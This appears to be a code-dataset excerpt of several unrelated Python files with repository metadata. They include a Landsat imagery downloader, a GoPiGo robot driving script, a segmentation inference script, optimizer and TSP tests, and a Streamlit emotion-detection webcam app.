work_folder = "temp" def download_scene_list(): gzip_path = work_folder + "/scene_list.gz" unpack_path = work_folder + "/scene_list.csv" if os.path.isfile(unpack_path): now = time.time() last_modified = os.path.getmtime(unpack_path) interval_in_seconds = now - last_modified if interval_in_seconds < (3 * 60 * 60): print "Already downloaded list is recent enough (<3h) ..." return unpack_path print "Downloading ..." urllib.urlretrieve ("http://landsat-pds.s3.amazonaws.com/scene_list.gz", gzip_path) gzip_handle = gzip.open(gzip_path) with open(unpack_path, "w") as out: for line in gzip_handle: out.write(line) return unpack_path def tail_from_scene_list(file_path, num_scenes): stdin, stdout = os.popen2("tail -n " + str(num_scenes) + " " + file_path) stdin.close() lines = stdout.readlines(); stdout.close() scenes = list() for line in lines: tokens = line.split(',') scene = (tokens[0], tokens[10][:-11]) # Remove /index.hmtl\n scenes.append(scene) return scenes def parse_mtl(mtl_path): mtl = dict() groupStack = [mtl]; for line in open(mtl_path, "r"): if line.strip() == "END": break parts = line.split("=", 1) key = parts[0].strip() value = parts[1].strip() if key == "GROUP": group = dict() groupStack[-1][value] = group groupStack.append(group) elif key == "END_GROUP": groupStack.pop() else: groupStack[-1][key] = value return mtl def download_mtl(scene): mtl_path = work_folder + "/" + scene[0] + "_scene.mtl" urllib.urlretrieve (scene[1] + scene[0] + "_MTL.txt", mtl_path) return parse_mtl(mtl_path) def is_scene_suitable(scene, max_cloud_cover): mtl = download_mtl(scene) projection = mtl["L1_METADATA_FILE"]["PROJECTION_PARAMETERS"]["MAP_PROJECTION"] cloud_cover = mtl["L1_METADATA_FILE"]["IMAGE_ATTRIBUTES"]["CLOUD_COVER"] cloud_cover = float(cloud_cover) return projection == '"UTM"' and cloud_cover < max_cloud_cover def find_scene(max_cloud_cover): print Fore.GREEN + "# Downloading scene list ..." if not os.path.exists(work_folder): os.makedirs(work_folder) num_scenes = 500 file_path = download_scene_list() print "" print Fore.GREEN + "# Finding recent and suitable scene ..." scenes = tail_from_scene_list(file_path, num_scenes) for count in range(0, num_scenes): random_index = random.randint(0, num_scenes - 1) scene = scenes[random_index] if is_scene_suitable(scene, max_cloud_cover): print scene[0] print "" return scene[0] print "No suitable scene found ..." return "" def download_scene(scene_id): print Fore.GREEN + "# Downloading scene ..." downloader = Downloader(verbose=True, download_dir=work_folder) loaded = downloader.download([str(scene_id)], [4, 3, 2]) print "" return len(loaded) == 1 def convert_scene(scene_id, quality_in_percent, resize_in_percent): print Fore.GREEN + "# Processing scene ..." processor = Simple(work_folder + "/" + scene_id, [4, 3, 2], work_folder) processedTIF = processor.run() convertedJPG = scene_id + ".jpg" command = "convert -quality {} -resize {}% {} {}".format(str(quality_in_percent), str(resize_in_percent), processedTIF, convertedJPG) subprocess.call(command, shell=True) print "" def determine_country(lat, lon): connection = httplib.HTTPConnection("maps.googleapis.com") connection.request("GET", "/maps/api/geocode/json?latlng={},{}".format(lat, lon)) response = json.load(connection.getresponse()) if response["status"] == "OK": for result in response["results"]: if "country" in result["types"]: return result["formatted_address"] return "" def determine_countries(mtl): ll_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LAT_PRODUCT"] ll_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LON_PRODUCT"] lr_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LR_LAT_PRODUCT"] lr_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LR_LON_PRODUCT"] ur_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LAT_PRODUCT"] ur_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LON_PRODUCT"] ul_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UL_LAT_PRODUCT"] ul_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UL_LON_PRODUCT"] countries = set([determine_country(ll_lat, ll_lon), determine_country(lr_lat, lr_lon), determine_country(ur_lat, ur_lon), determine_country(ul_lat, ul_lon)]) if "" in countries: countries.remove("") return countries def calculate_latlon_midpoint(lat1, lon1, lat2, lon2): "Calculation of geographic midpoint with method A: http://www.geomidpoint.com/calculation.html" lat1 = math.radians(lat1) lon1 = math.radians(lon1) lat2 = math.radians(lat2) lon2 = math.radians(lon2) w1 = 1 w2 = 2 w_total = w1 + w2 x1 = math.cos(lat1) * math.cos(lon1) y1 = math.cos(lat1) * math.sin(lon1) z1 = math.sin(lat1) x2 = math.cos(lat2) * math.cos(lon2) y2 = math.cos(lat2) * math.sin(lon2) z2 = math.sin(lat2) x = ((x1 * w1) + (x2 * w2)) / w_total y = ((y1 * w1) + (y2 * w2)) / w_total z = ((z1 * w1) + (z2 * w2)) / w_total hyp = math.sqrt(x * x + y * y) mid_lat = math.atan2(z, hyp) mid_lon = math.atan2(y, x) return (math.degrees(mid_lat), math.degrees(mid_lon)) def collect_metadata(scene_id): print Fore.GREEN + "# Collecting metadata ..." mtl_path = work_folder + "/" + scene_id + "/" + scene_id + "_MTL.txt" mtl = parse_mtl(mtl_path) date = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["DATE_ACQUIRED"] cloud_cover = mtl["L1_METADATA_FILE"]["IMAGE_ATTRIBUTES"]["CLOUD_COVER"] ll_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LAT_PRODUCT"] ll_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LON_PRODUCT"] ur_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LAT_PRODUCT"] ur_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LON_PRODUCT"] center_latlon = calculate_latlon_midpoint(float(ll_lat), float(ll_lon), float(ur_lat), float(ur_lon)) countries = list(determine_countries(mtl)) print "Scene ID: " + scene_id print "Date acquired: " + date print "Cloud cover: " + cloud_cover print "Lower left latitude: " + ll_lat print "Lower left longitude: " + ll_lon print "Upper right latitude: " + ur_lat print "Upper right longitude: " + ur_lon print "Center latitude: " + str(center_latlon[0]) print "Center longitude: " + str(center_latlon[1]) print "Countries: " + str(countries) metadata = {} metadata["scene_id"] = scene_id metadata["date_acquired"] = date metadata["cloud_cover"] = float(cloud_cover) metadata["lower_left_lat"] = float(ll_lat) metadata["lower_left_lon"] = float(ll_lon) metadata["upper_right_lat"] = float(ur_lat) metadata["upper_right_lon"] = float(ur_lon) metadata["center_lat"] = center_latlon[0] metadata["center_lon"] = center_latlon[1] metadata["countries"] = countries metadataPath = scene_id + "_metadata.json" with open(metadataPath, "w") as outfile: json.dump(metadata, outfile) print "" def create_soft_links(scene_id): print Fore.GREEN + "# Creating soft links ..." lns_source_path = scene_id + ".jpg" lns_target_path = "LATEST.jpg" lns_meta_source_path = scene_id + "_metadata.json" lns_meta_target_path = "LATEST_metadata.json" try: os.remove(lns_target_path) except: pass try: os.remove(lns_meta_target_path) except: pass os.symlink(lns_source_path, lns_target_path) os.symlink(lns_meta_source_path, lns_meta_target_path) print lns_target_path print lns_meta_target_path print "" def clean_up_scene(scene_id): print Fore.GREEN + "# Cleaning up ..." clean_path = work_folder + "/" + scene_id shutil.rmtree(clean_path) print clean_path clean_mtl = work_folder + "/" + scene_id + "_scene.mtl" try: os.remove(clean_mtl) print clean_mtl except: pass try: os.rmdir(work_folder) print work_folder + "/" except: print work_folder + "/ is not empty: no action" print "" def print_scene_result(scene_id): print Fore.GREEN + "# Scene image created ..." print scene_id + ".JPG" print scene_id + "_metadata.json" print ""
7,701
0
322
a8653de9534d324f4c8a879ca13240c42270307c
3,734
py
Python
Shelby/driving_school.py
itinstructor/WNCCNASA
64896f896cfaa694f4ae7f9f62948811164d10c0
[ "CC0-1.0" ]
null
null
null
Shelby/driving_school.py
itinstructor/WNCCNASA
64896f896cfaa694f4ae7f9f62948811164d10c0
[ "CC0-1.0" ]
null
null
null
Shelby/driving_school.py
itinstructor/WNCCNASA
64896f896cfaa694f4ae7f9f62948811164d10c0
[ "CC0-1.0" ]
null
null
null
# name: driving_school.py #--------------------------------- IMPORTS -------------------------------------# import time # Import time library for sleep function import easygopigo3 as easy # Import the GoPiGo3 library gpg = easy.EasyGoPiGo3() # Create a EasyGoPiGo3 object # Initialize a distance sensor object distance_sensor = gpg.init_distance_sensor() # Initialize a servo object on Servo Port 1 servo = gpg.init_servo("SERVO1") # Set servo pointing straight ahead at 90 degrees # You may have to change the degrees to adapt to your servo # All servos line up slightly differently # Less than 90 moves the servo to the right # Greater than 90 moves the servo to the left servo.rotate_servo(90) gpg.set_speed(200) # Set initial speed AVOIDANCE_DISTANCE = 12 # Distance in inches from obstacle where the GoPiGo should stop # If a standalone program, call the main function # Else, use as a module if __name__ == '__main__': main()
37.34
135
0.630691
# name: driving_school.py #--------------------------------- IMPORTS -------------------------------------# import time # Import time library for sleep function import easygopigo3 as easy # Import the GoPiGo3 library gpg = easy.EasyGoPiGo3() # Create a EasyGoPiGo3 object # Initialize a distance sensor object distance_sensor = gpg.init_distance_sensor() # Initialize a servo object on Servo Port 1 servo = gpg.init_servo("SERVO1") # Set servo pointing straight ahead at 90 degrees # You may have to change the degrees to adapt to your servo # All servos line up slightly differently # Less than 90 moves the servo to the right # Greater than 90 moves the servo to the left servo.rotate_servo(90) gpg.set_speed(200) # Set initial speed AVOIDANCE_DISTANCE = 12 # Distance in inches from obstacle where the GoPiGo should stop def main(): #Print menu #menu method while True: print_menu_choice() menu_choice = int(input("Please pick a number from the menu: ")) if(menu_choice ==1): right_square_turn() elif(menu_choice ==2): left_square_turn() elif(menu_choice == 3): triangle_turn() elif(menu_choice == 4): octagon_turn() elif(menu_choice ==5): five_point_star() def print_menu_choice(): print("1. right square turn:") print("2. left square turn: ") print("3. triangle turn: ") print("4. octagon turn: ") print("5. 5 point star turn: ") def right_square_turn(): # Menu option 1 # need a way to start it I think for x in range(4): gpg.drive_inches(12) gpg.turn_degrees(90) def left_square_turn(): #Menu option 2 for x in range(4): # loop the things so I don't have to type that shit 4 times gpg.drive_inches(12) #go forward 12 inches gpg.turn_degrees(-90) #-90 degrees is turning left I think def triangle_turn(): # Menu option 3 for x in range(3): gpg.drive_inches(12) #go forward 12 inches gpg.turn_degrees(120) # 60 degrees is interior angle for a triangle. If this gives weird results, try the anterior angle of 120 def octagon_turn(): #Option 4 for x in range(8): #Loop it 8 times to complete the shape gpg.drive_inches(12) #forward 12inches gpg.turn_degrees(45) #45 degrees for each turn def five_point_star():#Option 5 #stars have like a lot of angles. for x in range (5): gpg.drive_inches(12) #12 inches gpg.turn_degrees(252) #idk if that is right maybe 72, or 108 def obstacle_avoid(): print("Press ENTER to start") input() # Wait for input to start gpg.forward() # Start moving forward, GoPiGo will continue moving forward until it receives another movement command running = True # Boolean/flag to control the while loop while running == True: # Loop while running == True dist = distance_sensor.read_inches() # Find the distance of the object in front print("Dist:", dist, 'inches') # Print feedback to the console # If the object is closer than the "distance_to_stop" distance, stop the GoPiGo if dist < AVOIDANCE_DISTANCE: print("Stopping") # Print feedback to the console gpg.stop() # Stop the GoPiGo running = False # Set running to false to break out of the loop # sleep is blocking code, nothing else can happen during sleep time.sleep(.1) # 100 milliseconds # If a standalone program, call the main function # Else, use as a module if __name__ == '__main__': main()
2,524
0
184
b634679a67b91315266daf78a009e523cc08ee09
130
py
Python
awesome_panel_extensions/developer_tools/test_apps/__init__.py
Jhsmit/awesome-panel-extensions
41eba7cf84caa911be4ed0df2a96e16fc1e70263
[ "CC-BY-4.0" ]
3
2020-07-16T07:28:45.000Z
2020-07-17T12:53:56.000Z
awesome_panel_extensions/developer_tools/test_apps/__init__.py
MarcSkovMadsen/panel-extensions-template
f41ad8d8fb8502f87de3a4992917cbffb6299012
[ "CC-BY-4.0" ]
null
null
null
awesome_panel_extensions/developer_tools/test_apps/__init__.py
MarcSkovMadsen/panel-extensions-template
f41ad8d8fb8502f87de3a4992917cbffb6299012
[ "CC-BY-4.0" ]
null
null
null
"""The PanelComponentExplorer makes it easy to explore components""" from .panel_component_explorer import PanelComponentExplorer
43.333333
68
0.853846
"""The PanelComponentExplorer makes it easy to explore components""" from .panel_component_explorer import PanelComponentExplorer
0
0
0
fe026149c752b3c212f98f38d4913e3dea8346b2
1,967
py
Python
Classes/ResUNetPlusPlus/infer.py
Nitin-Mane/ALL-PyTorch-Segmentation-2021
0f3c7b129629cc2863c502898bcfa3c45077af85
[ "MIT" ]
null
null
null
Classes/ResUNetPlusPlus/infer.py
Nitin-Mane/ALL-PyTorch-Segmentation-2021
0f3c7b129629cc2863c502898bcfa3c45077af85
[ "MIT" ]
null
null
null
Classes/ResUNetPlusPlus/infer.py
Nitin-Mane/ALL-PyTorch-Segmentation-2021
0f3c7b129629cc2863c502898bcfa3c45077af85
[ "MIT" ]
null
null
null
import os import numpy as np import cv2 from glob import glob from tqdm import tqdm import tensorflow as tf from tensorflow.keras.models import load_model from tensorflow.keras.utils import CustomObjectScope from data_generator import * from metrics import dice_coef, dice_loss if __name__ == "__main__": model_path = "../model/model/resunetplusplus.h5" save_path = "../model/result" test_path = "../model/data/" image_size = 256 batch_size = 1 test_image_paths = glob(os.path.join(test_path, "imgs", "*")) test_mask_paths = glob(os.path.join(test_path, "masks", "*")) test_image_paths.sort() test_mask_paths.sort() ## Create result folder try: os.mkdir(save_path) except: pass ## Model with CustomObjectScope({'dice_loss': dice_loss, 'dice_coef': dice_coef}): model = load_model(model_path) ## Test print("Test Result: ") test_steps = len(test_image_paths)//batch_size test_gen = DataGen(image_size, test_image_paths, test_mask_paths, batch_size=batch_size) model.evaluate_generator(test_gen, steps=test_steps, verbose=1) ## Generating the result for i, path in tqdm(enumerate(test_image_paths), total=len(test_image_paths)): image = parse_image(test_image_paths[i], image_size) mask = parse_mask(test_mask_paths[i], image_size) predict_mask = model.predict(np.expand_dims(image, axis=0))[0] predict_mask = (predict_mask > 0.5) * 255.0 sep_line = np.ones((image_size, 10, 3)) * 255 mask = mask_to_3d(mask) predict_mask = mask_to_3d(predict_mask) all_images = [image * 255, sep_line, mask * 255, sep_line, predict_mask] cv2.imwrite(f"{save_path}/{i}.png", np.concatenate(all_images, axis=1)) print("Test image generation complete")
30.261538
92
0.682766
import os import numpy as np import cv2 from glob import glob from tqdm import tqdm import tensorflow as tf from tensorflow.keras.models import load_model from tensorflow.keras.utils import CustomObjectScope from data_generator import * from metrics import dice_coef, dice_loss def mask_to_3d(mask): mask = np.squeeze(mask) mask = [mask, mask, mask] mask = np.transpose(mask, (1, 2, 0)) return mask if __name__ == "__main__": model_path = "../model/model/resunetplusplus.h5" save_path = "../model/result" test_path = "../model/data/" image_size = 256 batch_size = 1 test_image_paths = glob(os.path.join(test_path, "imgs", "*")) test_mask_paths = glob(os.path.join(test_path, "masks", "*")) test_image_paths.sort() test_mask_paths.sort() ## Create result folder try: os.mkdir(save_path) except: pass ## Model with CustomObjectScope({'dice_loss': dice_loss, 'dice_coef': dice_coef}): model = load_model(model_path) ## Test print("Test Result: ") test_steps = len(test_image_paths)//batch_size test_gen = DataGen(image_size, test_image_paths, test_mask_paths, batch_size=batch_size) model.evaluate_generator(test_gen, steps=test_steps, verbose=1) ## Generating the result for i, path in tqdm(enumerate(test_image_paths), total=len(test_image_paths)): image = parse_image(test_image_paths[i], image_size) mask = parse_mask(test_mask_paths[i], image_size) predict_mask = model.predict(np.expand_dims(image, axis=0))[0] predict_mask = (predict_mask > 0.5) * 255.0 sep_line = np.ones((image_size, 10, 3)) * 255 mask = mask_to_3d(mask) predict_mask = mask_to_3d(predict_mask) all_images = [image * 255, sep_line, mask * 255, sep_line, predict_mask] cv2.imwrite(f"{save_path}/{i}.png", np.concatenate(all_images, axis=1)) print("Test image generation complete")
115
0
23
ce6f68a12848e1fc926ef7139ad157fd2c14acc3
1,157
py
Python
tests/test_base.py
Czaki/tsp_spanning
3f0e5f338f17996c5f634824ed61282d2ea2487c
[ "MIT" ]
null
null
null
tests/test_base.py
Czaki/tsp_spanning
3f0e5f338f17996c5f634824ed61282d2ea2487c
[ "MIT" ]
null
null
null
tests/test_base.py
Czaki/tsp_spanning
3f0e5f338f17996c5f634824ed61282d2ea2487c
[ "MIT" ]
null
null
null
import unittest import numpy as np from tsp_spanning import tsp, point_tsp, points_to_distance_matrix if __name__ == "__main__": unittest.main()
32.138889
66
0.587727
import unittest import numpy as np from tsp_spanning import tsp, point_tsp, points_to_distance_matrix class TestTSP(unittest.TestCase): def test_work_point(self): points = [(0, 0), (1, 1), (-1, -1), (1, 0)] res = point_tsp(points) self.assertTrue(len(res) == 4) self.assertTrue(set(points) == set(map(tuple,res))) def test_work_point_3d(self): points = [(0, 0, 0), (1, 1, 1), (-1, -1, -1), (1, 0, 0)] res = point_tsp(points) self.assertTrue(len(res) == 4) self.assertTrue(set(points) == set(map(tuple,res))) def test_work_tsp(self): points = np.array([(0, 0), (1, 1), (-1, -1), (1, 0)]) distances = points_to_distance_matrix(points) self.assertTrue(distances.shape == (4,4)) points_order = tsp(distances) self.assertTrue(len(points_order) == 4) def test_work_tsp_end(self): points = np.array([(0, 0), (1, 1), (-1, -1), (1, 0)]) distances = points_to_distance_matrix(points) points_order = tsp(distances, 1) self.assertTrue(points_order[-1] == 1) if __name__ == "__main__": unittest.main()
858
12
134
f19d2d3c111237c6c5a7402ac82046221d1da7af
3,012
py
Python
generation-items/items-processor.py
miomao34/data-generator
89380929b42ba1f95f8e3e57c1f93ee7365a56d7
[ "MIT" ]
null
null
null
generation-items/items-processor.py
miomao34/data-generator
89380929b42ba1f95f8e3e57c1f93ee7365a56d7
[ "MIT" ]
null
null
null
generation-items/items-processor.py
miomao34/data-generator
89380929b42ba1f95f8e3e57c1f93ee7365a56d7
[ "MIT" ]
null
null
null
import json import csv from typing import Dict, List, Union def get_items_list(filename: str) -> List: """Loads items data from formatted csv files and returns the items list """ primary_title_column = 0 secondary_title_column = 1 rarity_column = 2 name_column = 3 # stats are messy and aren't applicable, so not used # stats_column = 4 description_column = 5 primary_title = '' secondary_title = '' output = [] with open(filename, 'r') as file: reader = csv.reader(file) index = 1 for row in reader: if row[primary_title_column] != '': primary_title = row[primary_title_column] secondary_title = '' continue if row[secondary_title_column] != '': secondary_title = row[secondary_title_column] continue item = {} # passed through titles, so here's data only # no EOF because reader iterates over not empty rows only if row[name_column] == '': # TODO: push error to log print(f'No name on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue if row[description_column] == '': # TODO: push error to log print(f'No description on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue item['primary_title'] = primary_title if secondary_title != '': item['secondary_title'] = secondary_title if row[rarity_column] != '': item['rarity'] = int(row[rarity_column]) item['name'] = row[name_column] item['description'] = row[description_column] print(f'Got a {item["primary_title"]} item{"" if "secondary_title" not in item else " for " + item["secondary_title"]}: {item["name"]}. \"{item["description"]}\"') output.append(item) index += 1 return output if __name__ == '__main__': files = [ ['generation-items/anno/csv/academy-items.csv', 'generation-items/anno/json/academy-items.json'], ['generation-items/anno/csv/ark-items.csv', 'generation-items/anno/json/ark-items.json'], ['generation-items/anno/csv/lab-items.csv', 'generation-items/anno/json/lab-items.json'], ['generation-items/anno/csv/vehicle-items.csv', 'generation-items/anno/json/vehicle-items.json'], ['generation-items/anno/csv/warehouse-items.csv', 'generation-items/anno/json/warehouse-items.json'] ] for file_pair in files: save_list_to_json( get_items_list(file_pair[0]), file_pair[1] )
34.227273
175
0.583333
import json import csv from typing import Dict, List, Union def get_items_list(filename: str) -> List: """Loads items data from formatted csv files and returns the items list """ primary_title_column = 0 secondary_title_column = 1 rarity_column = 2 name_column = 3 # stats are messy and aren't applicable, so not used # stats_column = 4 description_column = 5 primary_title = '' secondary_title = '' output = [] with open(filename, 'r') as file: reader = csv.reader(file) index = 1 for row in reader: if row[primary_title_column] != '': primary_title = row[primary_title_column] secondary_title = '' continue if row[secondary_title_column] != '': secondary_title = row[secondary_title_column] continue item = {} # passed through titles, so here's data only # no EOF because reader iterates over not empty rows only if row[name_column] == '': # TODO: push error to log print(f'No name on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue if row[description_column] == '': # TODO: push error to log print(f'No description on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue item['primary_title'] = primary_title if secondary_title != '': item['secondary_title'] = secondary_title if row[rarity_column] != '': item['rarity'] = int(row[rarity_column]) item['name'] = row[name_column] item['description'] = row[description_column] print(f'Got a {item["primary_title"]} item{"" if "secondary_title" not in item else " for " + item["secondary_title"]}: {item["name"]}. \"{item["description"]}\"') output.append(item) index += 1 return output def save_list_to_json(list: List, output_filename: str) -> None: with open(output_filename, 'a+') as output: json.dump(list, output) if __name__ == '__main__': files = [ ['generation-items/anno/csv/academy-items.csv', 'generation-items/anno/json/academy-items.json'], ['generation-items/anno/csv/ark-items.csv', 'generation-items/anno/json/ark-items.json'], ['generation-items/anno/csv/lab-items.csv', 'generation-items/anno/json/lab-items.json'], ['generation-items/anno/csv/vehicle-items.csv', 'generation-items/anno/json/vehicle-items.json'], ['generation-items/anno/csv/warehouse-items.csv', 'generation-items/anno/json/warehouse-items.json'] ] for file_pair in files: save_list_to_json( get_items_list(file_pair[0]), file_pair[1] )
123
0
23
786d33695c7f8f1b30e7a5ec291198dcf8be08ba
2,325
py
Python
tests/opytimizer/optimizers/science/test_efo.py
anukaal/opytimizer
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
[ "Apache-2.0" ]
528
2018-10-01T20:00:09.000Z
2022-03-27T11:15:31.000Z
tests/opytimizer/optimizers/science/test_efo.py
anukaal/opytimizer
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
[ "Apache-2.0" ]
17
2019-10-30T00:47:03.000Z
2022-03-21T11:39:28.000Z
tests/opytimizer/optimizers/science/test_efo.py
anukaal/opytimizer
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
[ "Apache-2.0" ]
35
2018-10-01T20:03:23.000Z
2022-03-20T03:54:15.000Z
import numpy as np from opytimizer.optimizers.science import efo from opytimizer.spaces import search np.random.seed(0)
18.164063
79
0.569462
import numpy as np from opytimizer.optimizers.science import efo from opytimizer.spaces import search np.random.seed(0) def test_efo_params(): params = { 'positive_field': 0.1, 'negative_field': 0.5, 'ps_ratio': 0.1, 'r_ratio': 0.4 } new_efo = efo.EFO(params=params) assert new_efo.positive_field == 0.1 assert new_efo.negative_field == 0.5 assert new_efo.ps_ratio == 0.1 assert new_efo.r_ratio == 0.4 assert new_efo.phi == (1 + np.sqrt(5)) / 2 assert new_efo.RI == 0 def test_efo_params_setter(): new_efo = efo.EFO() try: new_efo.positive_field = 'a' except: new_efo.positive_field = 0.5 try: new_efo.positive_field = -1 except: new_efo.positive_field = 0.5 assert new_efo.positive_field == 0.5 try: new_efo.negative_field = 'b' except: new_efo.negative_field = 0.2 try: new_efo.negative_field = 0.99 except: new_efo.negative_field = 0.2 try: new_efo.negative_field = -1 except: new_efo.negative_field = 0.2 assert new_efo.negative_field == 0.2 try: new_efo.ps_ratio = 'c' except: new_efo.ps_ratio = 0.25 try: new_efo.ps_ratio = -1 except: new_efo.ps_ratio = 0.25 assert new_efo.ps_ratio == 0.25 try: new_efo.r_ratio = 'd' except: new_efo.r_ratio = 0.25 try: new_efo.r_ratio = -1 except: new_efo.r_ratio = 0.25 assert new_efo.r_ratio == 0.25 try: new_efo.phi = 'e' except: new_efo.phi = (1 + np.sqrt(5)) / 2 assert new_efo.phi == (1 + np.sqrt(5)) / 2 try: new_efo.RI = 'f' except: new_efo.RI = 0 try: new_efo.RI = -1 except: new_efo.RI = 0 assert new_efo.RI == 0 def test_efo_calculate_indexes(): new_efo = efo.EFO() a, b, c = new_efo._calculate_indexes(30) assert a >= 0 assert b >= 0 assert c >= 0 def test_efo_update(): def square(x): return np.sum(x**2) new_efo = efo.EFO() search_space = search.SearchSpace(n_agents=2, n_variables=2, lower_bound=[1, 1], upper_bound=[10, 10]) new_efo.update(search_space, square)
2,107
0
92
22af80f58a32481092f7cbbec89e46075559aa22
783
py
Python
src/jams/task.py
saromanov/jams
76b95b373cc41466c0d397c8c5681a02b0345e16
[ "MIT" ]
null
null
null
src/jams/task.py
saromanov/jams
76b95b373cc41466c0d397c8c5681a02b0345e16
[ "MIT" ]
3
2019-01-03T19:41:01.000Z
2019-01-31T13:14:26.000Z
src/jams/task.py
saromanov/jams
76b95b373cc41466c0d397c8c5681a02b0345e16
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ james.task ~~~~~~~~~~~~~ Implementation of the task. Task this is action which contains checking. It should contains rule, weight """
22.371429
66
0.58493
# -*- coding: utf-8 -*- """ james.task ~~~~~~~~~~~~~ Implementation of the task. Task this is action which contains checking. It should contains rule, weight """ class TaskBase: def __init__(self, name, *args, **kwargs): self._name = name def __str__(self): return self._name def __getattr__(self, name): return '{0} call'.format(name) def do(self): raise NotImplementedError def weight(self): """return weight of the task in the case if task was completed """ return 0 class Task(TaskBase): def __init__(self, name, *args, **kwargs): self._weight = kwargs.get('weight') self._action = kwargs.get('action') super().__init__(name, *args, **kwargs)
299
232
72
2d15005c1f91448fffe8337592d219ad885c8d0d
964
py
Python
baloney/__main__.py
tonybaloney/baloney-script
24b1158634e473d48f14d23c9f66a049bdcce6f9
[ "MIT" ]
null
null
null
baloney/__main__.py
tonybaloney/baloney-script
24b1158634e473d48f14d23c9f66a049bdcce6f9
[ "MIT" ]
null
null
null
baloney/__main__.py
tonybaloney/baloney-script
24b1158634e473d48f14d23c9f66a049bdcce6f9
[ "MIT" ]
null
null
null
import argparse import baloney.parser as baloney_parser from baloney.interpreter import BaloneyInterpreter parser = argparse.ArgumentParser() parser.add_argument('--lex', type=bool) parser.add_argument("file", type=str, help="Target .bs file") if __name__ == '__main__': args = parser.parse_args() main(args)
25.368421
54
0.61722
import argparse import baloney.parser as baloney_parser from baloney.interpreter import BaloneyInterpreter parser = argparse.ArgumentParser() parser.add_argument('--lex', type=bool) parser.add_argument("file", type=str, help="Target .bs file") def run_lexer(source): from baloney.lexer import lexer lexer.input(source) while True: tok = lexer.token() if not tok: break # No more input print(tok) def main(args): with open(args.file, 'rb') as source: source_str = source.read() if args.lex: run_lexer(source_str) else: program = baloney_parser.parse(source_str) if not program: raise SystemExit interpreted_program = BaloneyInterpreter(prog) try: b.run() raise SystemExit except RuntimeError: pass if __name__ == '__main__': args = parser.parse_args() main(args)
579
0
46
e0cad9a632da0f19e6edc97400a819c5abc7284c
2,088
py
Python
app.py
totoropo/Emotion-Detection-
cbecd89a0693f44ad2abc29fd96320841f875ad9
[ "RSA-MD" ]
3
2021-06-18T10:21:02.000Z
2021-06-21T05:54:38.000Z
app.py
tsangharry/Emotion-Detection-
cbecd89a0693f44ad2abc29fd96320841f875ad9
[ "RSA-MD" ]
null
null
null
app.py
tsangharry/Emotion-Detection-
cbecd89a0693f44ad2abc29fd96320841f875ad9
[ "RSA-MD" ]
null
null
null
import streamlit as st import cv2 import os from inference import return_annotated_images from tensorflow.keras.models import load_model from streamlit_webrtc import ( ClientSettings, VideoTransformerBase, WebRtcMode, webrtc_streamer, ) WEBRTC_CLIENT_SETTINGS = ClientSettings( rtc_configuration={"iceServers": [{"urls": ["stun:stun.l.google.com:19302"]}]}, media_stream_constraints={"video": True, "audio": False}, ) def app_object_detection(): """Launches video with webrtc, calls annotated images. Returns: video : Annotated video. """ webrtc_ctx = webrtc_streamer( key="object-detection", mode=WebRtcMode.SENDRECV, client_settings=WEBRTC_CLIENT_SETTINGS, video_transformer_factory=NNVideoTransformer, async_transform=True) if webrtc_ctx.video_transformer: webrtc_ctx.video_transformer.confidence_threshold = 0.5 def main(): """ Streamlit interface. """ page_bg_img = ''' <style> body { background-image: url("https://www.fg-a.com/wallpapers/white-marble-1-2018.jpg"); background-size: cover; } </style> ''' st.markdown(page_bg_img, unsafe_allow_html=True) st.header("Emotion Detection from Facial Expressions") st.subheader('Unable to tell emotions like Sheldon Cooper? Let us help.') st.subheader('😀😮😔😡😐') app_object_detection() main()
27.84
92
0.665709
import streamlit as st import cv2 import os from inference import return_annotated_images from tensorflow.keras.models import load_model from streamlit_webrtc import ( ClientSettings, VideoTransformerBase, WebRtcMode, webrtc_streamer, ) WEBRTC_CLIENT_SETTINGS = ClientSettings( rtc_configuration={"iceServers": [{"urls": ["stun:stun.l.google.com:19302"]}]}, media_stream_constraints={"video": True, "audio": False}, ) def app_object_detection(): """Launches video with webrtc, calls annotated images. Returns: video : Annotated video. """ class NNVideoTransformer(VideoTransformerBase): def __init__(self): prototxtPath = os.path.sep.join(['face_detector', "deploy.prototxt"]) weightsPath = os.path.sep.join(['face_detector', "res10_300x300_ssd_iter_140000.caffemodel"]) self.faceNet = cv2.dnn.readNet(prototxtPath, weightsPath) self.emotionsNet = load_model('model/emo.h5') def transform(self, frame): image = frame.to_ndarray(format="bgr24") annotated_image = return_annotated_images(image, self.faceNet, self.emotionsNet) return annotated_image webrtc_ctx = webrtc_streamer( key="object-detection", mode=WebRtcMode.SENDRECV, client_settings=WEBRTC_CLIENT_SETTINGS, video_transformer_factory=NNVideoTransformer, async_transform=True) if webrtc_ctx.video_transformer: webrtc_ctx.video_transformer.confidence_threshold = 0.5 def main(): """ Streamlit interface. """ page_bg_img = ''' <style> body { background-image: url("https://www.fg-a.com/wallpapers/white-marble-1-2018.jpg"); background-size: cover; } </style> ''' st.markdown(page_bg_img, unsafe_allow_html=True) st.header("Emotion Detection from Facial Expressions") st.subheader('Unable to tell emotions like Sheldon Cooper? Let us help.') st.subheader('😀😮😔😡😐') app_object_detection() main()
546
26
88
